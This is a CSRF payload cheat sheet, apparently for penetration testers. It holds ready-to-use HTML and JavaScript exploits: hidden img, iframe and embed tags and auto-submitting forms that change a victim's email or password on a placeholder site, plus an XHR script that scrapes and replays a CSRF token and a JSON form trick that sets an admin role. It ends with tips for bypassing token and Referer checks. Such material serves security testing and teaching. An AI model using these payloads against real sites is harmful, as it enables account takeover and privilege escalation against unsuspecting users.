Cross Site Request Forgery (CSRF)
What is a CSRF Attack?
In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Depending on the nature of the action, the attacker might be able to gain full control over the user's account. If the compromised user has a privileged role within the application, then the attacker might be able to take full control of all the application's data and functionality.
CSRF (GET Method)
Example URLs
http://target-vuln-web.com/email/[email protected]
http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass
Exploits
Exploit with HTML tag a
<a href="http://target-vuln-web.com/email/[email protected]">Click me</a>
<a href="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass">Click me</a>
Exploit with HTML tag img
<img style="display:none;" src="http://target-vuln-web.com/email/[email protected]">
<img style="display:none;" src="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass">
Exploit with HTML tag iframe
<iframe src="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass" style="display:none"></iframe>
Exploit with HTML tag embed
<embed type="image/jpg" src="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass" style="display:none;">
CSRF (POST Method)
Example requests
POST /email/change HTTP/1.1
Host: target-vuln-web.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=cookievalues
[email protected]
POST /user/new_password HTTP/1.1
Host: target-vuln-web.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Cookie: session=cookievalues
password=newpass&comfirm_password=newpass
Exploits
Form + Script Tag (Without Token)
<form id="csrf" action="http://target-vuln-web.com/user/new_password" method="POST">
<input type="hidden" name="password" value="newpass" />
<input type="hidden" name="comfirm_password" value="newpass" />
</form>
<script>
document.forms['csrf'].submit();
</script>
Form + Script Tag (With Token)
<form action="http://target-vuln-web.com/user/new_password" method="POST">
<input type="hidden" name="password" value="newpass" />
<input type="hidden" name="comfirm_password" value="newpass" />
<input type="hidden" name="token" value="tokenishere" />
</form>
<script>
document.forms[0].submit();
</script>
Exploit CSRF Vulnerability Via XSS (GET Method)
Without token
<script>
// A forged GET request that the browser sends with the victim's cookies; nothing in it is checked by the server
const HttpRequest = new XMLHttpRequest();
const url = "http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass";
HttpRequest.open("GET", url);
HttpRequest.send();
</script>
With token
<body onload="change_password()">
<script>
// The first request loads the page to read the per-user token; the second request replays it
function change_password() {
  const request = new XMLHttpRequest();
  const url = "http://localhost:80/vulnerabilities/csrf/";
  request.open("GET", url);
  request.onreadystatechange = () => {
    if (request.readyState === request.DONE && request.status === 200) {
      const response = request.responseText;
      // The token is a 32-character hex string embedded in the page
      const user_token = /[a-f0-9]{32}/.exec(response)[0];
      const payload = "http://localhost:80/vulnerabilities/csrf/?password_new=newpass&password_conf=newpass&Change=Change&user_token=" + user_token;
      const second_request = new XMLHttpRequest();
      second_request.open("GET", payload);
      second_request.send();
    }
  };
  request.send();
}
</script>
</body>
JSON POST
<form id="csrf" action="http://target-vuln-web.com/user/update" enctype="text/plain" method="POST">
<input type="hidden" name='{"role":"admin","uid":1337, "unknown":"' value='"}' />
</form>
<script>
document.getElementById("csrf").submit();
</script>
Tricks & Tips
- Sometimes the server accepts any user's CSRF token, because the token is not bound to the session that submits it.
- CSRF is commonly found in delete, enable and disable functions.
- If you can upload HTML files, you can bypass Referer header validation, because the uploaded page is served from the target's own origin.
- If you can upload files with unusual extensions, you can go on to CSRF, XSS or other client-side vulnerabilities.